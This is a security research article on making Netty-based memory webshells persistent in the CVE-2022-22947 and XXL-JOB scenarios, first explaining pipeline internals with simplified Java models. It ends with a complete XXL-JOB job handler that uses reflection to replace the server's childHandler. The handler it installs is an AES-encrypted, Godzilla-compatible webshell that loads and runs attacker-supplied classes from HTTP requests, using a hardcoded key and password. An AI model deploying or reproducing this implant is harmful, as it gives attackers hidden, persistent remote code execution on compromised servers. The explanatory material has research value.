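0x01 Preface

Because Netty builds its pipelines dynamically, constructing a memory shell for it differs somewhat from the Tomcat approach. The articles on Netty memory shells currently available online all revolve around two scenarios, CVE-2022-22947 and XXL-JOB, and none of them analyzes the mechanism in much detail. Starting from those two scenarios, this article looks at some details of Netty memory shells from the source-code angle, for reference.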

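0x02 Introduction to Netty

I/O events: there are inbound and outbound events, and each kind triggers a different kind of handler.

Handler (ChannelHandler): a handler processes I/O events. A custom handler usually extends one of the adapter classes below and overrides a callback such as channelRead to process requests, much like a filter.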

ChannelInboundHandlerAdapter: triggered by inbound I/O events

ChannelOutboundHandlerAdapter: triggered by outbound I/O events

ChannelDuplexHandler: triggered by both inbound and outbound events

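Channel (SocketChannel): can be thought of as a wrapper around a Socket that exposes the socket's state and its read/write operations. Whenever Netty establishes a connection, it creates a corresponding Channel instance and initializes the pipeline that belongs to that Channel.

Pipeline (ChannelPipeline): a doubly linked list of handlers, with methods such as addFirst and addLast for adding handlers. Note that every new inbound connection gets its own channel, and the channel creates its own pipeline in io.netty.channel.AbstractChannel#AbstractChannel(io.netty.channel.Channel).

One way to build a Netty memory shell is to insert a custom handler into the pipeline. Because pipelines are created dynamically, the real question is how to make that handler persist. This article takes that as its starting point and looks at how Netty memory shells work in different scenarios.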
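The persistence problem can be seen in a small stand-alone model. The sketch below is not Netty code: ModelPipeline and ModelChannel are hypothetical names, and the pipeline is reduced to a doubly linked list of handler names. It only illustrates that a handler added to one channel's pipeline does not show up in the pipeline of the next channel.

```java
import java.util.ArrayList;
import java.util.List;

// Simplified stand-in for a pipeline: a doubly linked list of named handlers.
// This is NOT Netty's DefaultChannelPipeline, only a model of its shape.
class ModelPipeline {
    private static final class Node {
        final String name;
        Node prev;
        Node next;
        Node(String name) { this.name = name; }
    }

    private final Node head = new Node("head");
    private final Node tail = new Node("tail");

    ModelPipeline() {
        head.next = tail;
        tail.prev = head;
    }

    ModelPipeline addFirst(String name) { return insertAfter(head, name); }

    ModelPipeline addLast(String name) { return insertAfter(tail.prev, name); }

    private ModelPipeline insertAfter(Node at, String name) {
        Node n = new Node(name);
        n.prev = at;
        n.next = at.next;
        at.next.prev = n;
        at.next = n;
        return this;
    }

    // Handler names between the head and tail sentinels, in order.
    List<String> names() {
        List<String> out = new ArrayList<>();
        for (Node n = head.next; n != tail; n = n.next) {
            out.add(n.name);
        }
        return out;
    }
}

// Each accepted connection gets a fresh channel, and each channel builds its own pipeline.
class ModelChannel {
    final ModelPipeline pipeline = new ModelPipeline().addLast("codec").addLast("business");
}

class PipelineDemo {
    public static void main(String[] args) {
        ModelChannel first = new ModelChannel();
        first.pipeline.addFirst("injected");      // only affects this one channel
        ModelChannel second = new ModelChannel(); // a later connection starts from scratch
        System.out.println(first.pipeline.names());   // [injected, codec, business]
        System.out.println(second.pipeline.names());  // [codec, business]
    }
}
```

In this model, anything that should appear in every pipeline has to be added by the code that builds pipelines, not to an individual pipeline. That is the idea the rest of the article pursues.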

0x03 CVE-2022-22947

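First, a quick recap of how a memory shell is injected in the CVE-2022-22947 scenario. The core of that write-up is modifying reactor.netty.transport.TransportConfig#doOnChannelInit. In reactor.netty, channel initialization happens in reactor.netty.transport.TransportConfig.TransportChannelInitializer#initChannel.

The key points are:

config.defaultOnChannelInit() returns a default ChannelPipelineConfigurer, and then is called on it, which leads into reactor.netty.ReactorNetty.CompositeChannelPipelineConfigurer#compositeChannelPipelineConfigurer. As the name suggests, this method merges objects: it combines the default ChannelPipelineConfigurer with config.doOnChannelInit and returns a CompositeChannelPipelineConfigurer.

CompositeChannelPipelineConfigurer#onChannelInit is then called. It loops over the configurers and calls onChannelInit on each one, including the doOnChannelInit that was set through reflection.

The example given by c0ny1 adds the handler inside onChannelInit. Because doOnChannelInit has been replaced through reflection, every later inbound connection repeats the flow above, which is what makes the handler persistent.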

    public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, SocketAddress socketAddress) {
        ChannelPipeline pipeline = channel.pipeline();
        pipeline.addBefore("reactor.left.httpTrafficHandler", "memshell_handler", new NettyMemshell());
    }
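The merge-and-loop behaviour described above can be modelled without reactor.netty. In the sketch below, ModelConfigurer and ModelConfig are hypothetical stand-ins (a "pipeline" is just a list of names), so this shows the shape of the flow under those assumptions rather than the library's actual implementation.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Hypothetical stand-in for ChannelPipelineConfigurer; the "pipeline" is a list of names.
interface ModelConfigurer {
    void onChannelInit(List<String> pipeline);

    // Mirrors the idea of then(): merge two configurers into one that runs both in order.
    default ModelConfigurer then(ModelConfigurer other) {
        List<ModelConfigurer> all = Arrays.asList(this, other);
        return pipeline -> {
            for (ModelConfigurer c : all) {
                c.onChannelInit(pipeline);
            }
        };
    }
}

// Stand-in for the long-lived config object whose doOnChannelInit field gets replaced.
class ModelConfig {
    ModelConfigurer doOnChannelInit = pipeline -> { };  // default: does nothing

    ModelConfigurer defaultOnChannelInit() {
        return pipeline -> pipeline.add("httpTrafficHandler");
    }

    // Runs once per new channel, playing the role of the channel initializer.
    List<String> initChannel() {
        List<String> pipeline = new ArrayList<>();
        defaultOnChannelInit().then(doOnChannelInit).onChannelInit(pipeline);
        return pipeline;
    }
}

class ConfigurerDemo {
    public static void main(String[] args) {
        ModelConfig config = new ModelConfig();
        System.out.println(config.initChannel());  // [httpTrafficHandler]

        // Replacing the field once changes every pipeline built afterwards.
        config.doOnChannelInit = pipeline -> pipeline.add(0, "extra_handler");
        System.out.println(config.initChannel());  // [extra_handler, httpTrafficHandler]
        System.out.println(config.initChannel());  // [extra_handler, httpTrafficHandler]
    }
}
```

The point of the model is that the config object outlives individual channels, so a change made to it is picked up each time a channel is initialized.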

Also, as the path reactor.netty.transport.TransportConfig#doOnChannelInit shows, this scenario depends on reactor.netty and does not apply to pure io.netty environments such as XXL-JOB.

0x04 XXL-JOB



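For a pure io.netty environment, the answer given in the XXL-JOB memory shell write-up is a tailored memory shell whose core idea is to replace the implementation of com.xxl.job.core.biz.impl.ExecutorBizImpl. Every new connection runs the channel initialization configured on the ServerBootstrap and reaches .addLast(new EmbedHttpServerHandler(executorBiz, accessToken, bizThreadPool));, while the executorBiz in EmbedServer is instantiated only once at startup and stays the same for the whole lifetime of the application. Replacing its implementation through dynamic class loading therefore makes the memory shell persistent.

At the start of that article the author also tried calling pipeline.addBefore through reflection and ran into the problem described above. It is easy to see, though, that the EmbedHttpServerHandler added through ServerBootstrap does stay resident in memory. To take advantage of that, the initialization of io.netty.bootstrap.ServerBootstrap needs a closer look.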

0x05 ServerBootstrap

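To keep things short, only the key code is covered here, starting right after the pipeline has been created. First, io.netty.bootstrap.ServerBootstrap#init adds a ServerBootstrapAcceptor to the pipeline. Pay attention to the childHandler here: it is another route to persistence and comes up again later.

At this point the pipeline in memory already contains the ServerBootstrapAcceptor.

The Netty introduction mentioned that a handler's channelRead method processes requests, so we can go straight to the implementation of io.netty.bootstrap.ServerBootstrap.ServerBootstrapAcceptor#channelRead. There, ServerBootstrapAcceptor adds the childHandler passed in earlier to the pipeline of the newly accepted child channel.

childHandler is defined by the developer. A ServerBootstrap is usually set up with the following pattern, which adds the handlers needed for client connections.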

    ServerBootstrap bootstrap = new ServerBootstrap();
    bootstrap.group(bossGroup, workerGroup)
            .channel(NioServerSocketChannel.class)
            .childHandler(new ChannelInitializer<SocketChannel>() {
                @Override
                public void initChannel(SocketChannel channel) throws Exception {
                    channel.pipeline().addLast(...).addLast(...);
                }
            });

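The developer-defined ChannelInitializer is eventually initialized through ChannelInitializer#initChannel. The call stack is as follows:

To sum up: every new connection triggers this initialization, and the pipeline then gets its other handlers from the current ChannelInitializer#initChannel. If we can use this to locate the ServerBootstrapAcceptor and replace its childHandler through reflection, handler persistence can be achieved as well.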
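The summary above can be illustrated with a plain-Java model. ModelAcceptor below is a hypothetical stand-in for the acceptor: it holds a child initializer in a private field and applies it to every new "connection". The field is left non-final here to keep the demo portable across JDK versions, and setField is an illustrative helper, not part of any library.

```java
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import java.util.function.Consumer;

// Hypothetical stand-in for the acceptor: it lives as long as the server does
// and holds the initializer that is applied to every child pipeline.
class ModelAcceptor {
    private Consumer<List<String>> childHandler;  // private, so the demo goes through reflection

    ModelAcceptor(Consumer<List<String>> childHandler) {
        this.childHandler = childHandler;
    }

    // Runs once per accepted connection and builds that connection's pipeline.
    List<String> accept() {
        List<String> childPipeline = new ArrayList<>();
        childHandler.accept(childPipeline);
        return childPipeline;
    }
}

class AcceptorDemo {
    // Illustrative helper: overwrite a declared field of the target by name.
    static void setField(Object target, String name, Object value) {
        try {
            Field f = target.getClass().getDeclaredField(name);
            f.setAccessible(true);
            f.set(target, value);
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        Consumer<List<String>> original = p -> p.add("business");
        ModelAcceptor acceptor = new ModelAcceptor(original);
        System.out.println(acceptor.accept());  // [business]

        // The replacement adds one handler and then delegates to the original initializer.
        Consumer<List<String>> replacement = p -> {
            p.add("extra");
            original.accept(p);
        };
        setField(acceptor, "childHandler", replacement);
        System.out.println(acceptor.accept());  // [extra, business]
        System.out.println(acceptor.accept());  // [extra, business]
    }
}
```

Delegating to the original initializer inside the replacement is a design choice of this sketch. It keeps the existing handlers in place, which is the same concern the second problem in the next section deals with.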

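0x06 Memory shell implementation

While looking into Netty I came across an article, xxl-job利用研究 (a study of XXL-JOB exploitation), whose EXP is already close to complete. The author closes with two open problems. First: "the registered handler must carry the @ChannelHandler.Sharable annotation, otherwise the executor throws an error and crashes". Second: "the bad news is that this memory shell works by replacing the handler, so the original execution logic disappears; restarting the executor before leaving is recommended".

Both problems are easy to solve:

1. As for needing @ChannelHandler.Sharable: in testing it is not required. Our custom handler is created with new inside initChannel, so each channel gets its own instance and the handler is, in principle, never shared.

2. As for the executor breaking after the ChannelInitializer is replaced through reflection: adding an EmbedHttpServerHandler in the replacement ChannelInitializer is enough to keep the original functionality.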
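The reasoning about sharing can be sketched in plain Java. The model below assumes a multiplicity check of roughly this shape (a handler instance that is not marked sharable may join a pipeline only once). ModelHandler and CheckedPipeline are hypothetical names, not Netty classes.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical handler: "sharable" stands in for the @ChannelHandler.Sharable annotation.
class ModelHandler {
    final boolean sharable;
    boolean added;  // set once this instance has joined any pipeline

    ModelHandler(boolean sharable) {
        this.sharable = sharable;
    }
}

// Hypothetical pipeline that refuses to reuse a non-sharable handler instance.
class CheckedPipeline {
    private final List<ModelHandler> handlers = new ArrayList<>();

    void addLast(ModelHandler h) {
        if (!h.sharable && h.added) {
            throw new IllegalStateException("handler is not sharable and was already added");
        }
        h.added = true;
        handlers.add(h);
    }

    int size() {
        return handlers.size();
    }
}

class SharableDemo {
    public static void main(String[] args) {
        // A new instance per pipeline: the check never fires.
        CheckedPipeline a = new CheckedPipeline();
        CheckedPipeline b = new CheckedPipeline();
        a.addLast(new ModelHandler(false));
        b.addLast(new ModelHandler(false));
        System.out.println(a.size() + " " + b.size());  // 1 1

        // One instance reused across two pipelines: rejected on the second add.
        ModelHandler reused = new ModelHandler(false);
        new CheckedPipeline().addLast(reused);
        try {
            new CheckedPipeline().addLast(reused);
        } catch (IllegalStateException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Under this assumption the annotation only matters when a single handler instance is reused, which is why creating the handler inside initChannel avoids the problem.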

    setFieldValue(embedHttpServerHandler, "childHandler", new ChannelInitializer<SocketChannel>() {
        @Override
        public void initChannel(SocketChannel channel) throws Exception {
            channel.pipeline()
                    .addLast(new IdleStateHandler(0, 0, 30 * 3, TimeUnit.SECONDS))  // beat 3N, close if idle
                    .addLast(new HttpServerCodec())
                    .addLast(new HttpObjectAggregator(5 * 1024 * 1024))  // merge request & response to FULL
                    .addLast(new NettyThreadHandler())
                    .addLast(new EmbedServer.EmbedHttpServerHandler(
                            new ExecutorBizImpl(),
                            "",
                            new ThreadPoolExecutor(
                                    0,
                                    200,
                                    60L,
                                    TimeUnit.SECONDS,
                                    new LinkedBlockingQueue<Runnable>(2000),
                                    new ThreadFactory() {
                                        @Override
                                        public Thread newThread(Runnable r) {
                                            return new Thread(r, "xxl-rpc, EmbedServer bizThreadPool-" + r.hashCode());
                                        }
                                    },
                                    new RejectedExecutionHandler() {
                                        @Override
                                        public void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {
                                            throw new RuntimeException("xxl-job, EmbedServer bizThreadPool is EXHAUSTED!");
                                        }
                                    })));
        }
    });

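Real-world use also needs to work with webshell management tools. For CVE-2022-22947 there is already a Godzilla shell to use as a reference, so NettyMemshell only needs small changes. Note that the channelRead method of that shell cannot be used as is. The problem is in the condition check: msg may well implement both HttpRequest and HttpContent, in which case the logic in the else branch is never reached. The fix is simple: remove the else.

As far as testing so far goes, normal functionality does not appear to be affected. The pipeline in memory looks as follows: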
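The branching issue is ordinary Java behaviour and can be shown without Netty. In the sketch below, ModelRequest, ModelContent and ModelFullRequest are hypothetical types standing in for a message that implements both interfaces at once.

```java
// Hypothetical message types: one object can be both a request and a content chunk.
interface ModelRequest {
    String uri();
}

interface ModelContent {
    byte[] content();
}

class ModelFullRequest implements ModelRequest, ModelContent {
    @Override
    public String uri() {
        return "/demo";
    }

    @Override
    public byte[] content() {
        return new byte[] {1, 2, 3};
    }
}

class BranchDemo {
    // With else: the second branch is skipped whenever the first one matches.
    static String withElse(Object msg) {
        StringBuilder seen = new StringBuilder();
        if (msg instanceof ModelRequest) {
            seen.append("request;");
        } else if (msg instanceof ModelContent) {
            seen.append("content;");
        }
        return seen.toString();
    }

    // Without else: both checks run, so an aggregated message is handled twice, once per role.
    static String withoutElse(Object msg) {
        StringBuilder seen = new StringBuilder();
        if (msg instanceof ModelRequest) {
            seen.append("request;");
        }
        if (msg instanceof ModelContent) {
            seen.append("content;");
        }
        return seen.toString();
    }

    public static void main(String[] args) {
        Object msg = new ModelFullRequest();
        System.out.println(withElse(msg));     // request;
        System.out.println(withoutElse(msg));  // request;content;
    }
}
```

When an aggregator sits earlier in the pipeline, the handler sees one combined message rather than separate header and body parts, which is the situation the two independent checks cover.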

package com.xxl.job.service.handler;import com.xxl.job.core.biz.impl.ExecutorBizImpl;import com.xxl.job.core.server.EmbedServer;import io.netty.buffer.ByteBuf;import io.netty.buffer.Unpooled;import io.netty.channel.*;import io.netty.channel.socket.SocketChannel;import io.netty.handler.codec.http.*;import io.netty.handler.timeout.IdleStateHandler;import java.io.ByteArrayOutputStream;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.net.URL;import java.net.URLClassLoader;import java.util.AbstractMap;import java.util.HashSet;import java.util.concurrent.*;import com.xxl.job.core.log.XxlJobLogger;import com.xxl.job.core.biz.model.ReturnT;import com.xxl.job.core.handler.IJobHandler;public class DemoGlueJobHandler extends IJobHandler {public static class NettyThreadHandler extends ChannelDuplexHandler{String xc = "3c6e0b8a9c15224a";String pass = "pass";String md5 = md5(pass + xc);String result = "";private static ThreadLocal<AbstractMap.SimpleEntry<HttpRequest,ByteArrayOutputStream>> requestThreadLocal = new ThreadLocal<>();private static Class payload;private static Class defClass(byte[] classbytes)throws Exception{URLClassLoader urlClassLoader = new URLClassLoader(new URL[0],Thread.currentThread().getContextClassLoader());Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);method.setAccessible(true);return (Class) method.invoke(urlClassLoader,classbytes,0,classbytes.length);}public byte[] x(byte[] s, boolean m) {try {javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");c.init(m ? 
1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));return c.doFinal(s);} catch(Exception e) {return null;}}public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch(Exception e) {}return ret;}@Override// Step2. 作为Handler处理请求,在此实现内存马的功能逻辑public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {if(((HttpRequest)msg).uri().contains("netty_memshell")) {if (msg instanceof HttpRequest){HttpRequest httpRequest = (HttpRequest) msg;AbstractMap.SimpleEntry<HttpRequest,ByteArrayOutputStream> simpleEntry = new AbstractMap.SimpleEntry(httpRequest,new ByteArrayOutputStream());requestThreadLocal.set(simpleEntry);}if(msg instanceof HttpContent){HttpContent httpContent = (HttpContent)msg;AbstractMap.SimpleEntry<HttpRequest,ByteArrayOutputStream> simpleEntry = requestThreadLocal.get();if (simpleEntry == null){return;}HttpRequest httpRequest = simpleEntry.getKey();ByteArrayOutputStream contentBuf = simpleEntry.getValue();ByteBuf byteBuf = httpContent.content();int size = byteBuf.capacity();byte[] requestContent = new byte[size];byteBuf.getBytes(0,requestContent,0,requestContent.length);contentBuf.write(requestContent);if (httpContent instanceof LastHttpContent){try {byte[] data = x(contentBuf.toByteArray(), false);if (payload == null) {payload = defClass(data);send(ctx,x(new byte[0], true),HttpResponseStatus.OK);} else {Object f = payload.newInstance();//初始化内存流java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();//将内存流传递给哥斯拉的payloadf.equals(arrOut);//将解密后的数据传递给哥斯拉Payloadf.equals(data);//通知哥斯拉Payload执行shell逻辑f.toString();//调用arrOut.toByteArray()获取哥斯拉Payload的输出send(ctx,x(arrOut.toByteArray(), true),HttpResponseStatus.OK);}} catch(Exception e) {ctx.fireChannelRead(httpRequest);}}else {ctx.fireChannelRead(msg);}}} else 
{ctx.fireChannelRead(msg);}}private void send(ChannelHandlerContext ctx, byte[] context, HttpResponseStatus status) {FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, status, Unpooled.copiedBuffer(context));response.headers().set(HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8");ctx.writeAndFlush(response).addListener(ChannelFutureListener.CLOSE);}}public ReturnT<String> execute(String param) throws Exception{try{ThreadGroup group = Thread.currentThread().getThreadGroup();Field threads = group.getClass().getDeclaredField("threads");threads.setAccessible(true);Thread[] allThreads = (Thread[]) threads.get(group);for (Thread thread : allThreads) {if (thread != null && thread.getName().contains("nioEventLoopGroup")) {try {Object target;try {target = getFieldValue(getFieldValue(getFieldValue(thread, "target"), "runnable"), "val\$eventExecutor");} catch (Exception e) {continue;}// NioEventLoopif (target.getClass().getName().endsWith("NioEventLoop")) {XxlJobLogger.log("NioEventLoop find");HashSet set = (HashSet) getFieldValue(getFieldValue(target, "unwrappedSelector"), "keys");if (!set.isEmpty()) {Object keys = set.toArray()[0];Object pipeline = getFieldValue(getFieldValue(keys, "attachment"), "pipeline");Object embedHttpServerHandler = getFieldValue(getFieldValue(getFieldValue(pipeline, "head"), "next"), "handler");// ThreadPoolExecutor bizThreadPool2 = (ThreadPoolExecutor) getFieldValue(embedHttpServerHandler, "bizThreadPool");// 设置初始化setFieldValue(embedHttpServerHandler, "childHandler", new ChannelInitializer<SocketChannel>() {@Overridepublic void initChannel(SocketChannel channel) throws Exception {channel.pipeline().addLast(new IdleStateHandler(0, 0, 30 * 3, TimeUnit.SECONDS)) // beat 3N, close if idle.addLast(new HttpServerCodec()).addLast(new HttpObjectAggregator(5 * 1024 * 1024)) // merge request & reponse to FULL.addLast(new NettyThreadHandler()).addLast(new EmbedServer.EmbedHttpServerHandler(new ExecutorBizImpl(), "", new 
ThreadPoolExecutor(0,200,60L,TimeUnit.SECONDS,new LinkedBlockingQueue<Runnable>(2000),new ThreadFactory() {@Overridepublic Thread newThread(Runnable r) {return new Thread(r, "xxl-rpc, EmbedServer bizThreadPool-" + r.hashCode());}},new RejectedExecutionHandler() {@Overridepublic void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {throw new RuntimeException("xxl-job, EmbedServer bizThreadPool is EXHAUSTED!");}})));}});XxlJobLogger.log("success!");break;}}} catch (Exception e){XxlJobLogger.log(e.toString());}}}}catch (Exception e){XxlJobLogger.log(e.toString());}return ReturnT.SUCCESS;}public Field getField(final Class<?> clazz, final String fieldName) {Field field = null;try {field = clazz.getDeclaredField(fieldName);field.setAccessible(true);} catch (NoSuchFieldException ex) {if (clazz.getSuperclass() != null){field = getField(clazz.getSuperclass(), fieldName);}}return field;}public Object getFieldValue(final Object obj, final String fieldName) throws Exception {final Field field = getField(obj.getClass(), fieldName);return field.get(obj);}public void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {final Field field = getField(obj.getClass(), fieldName);field.set(obj, value);}}
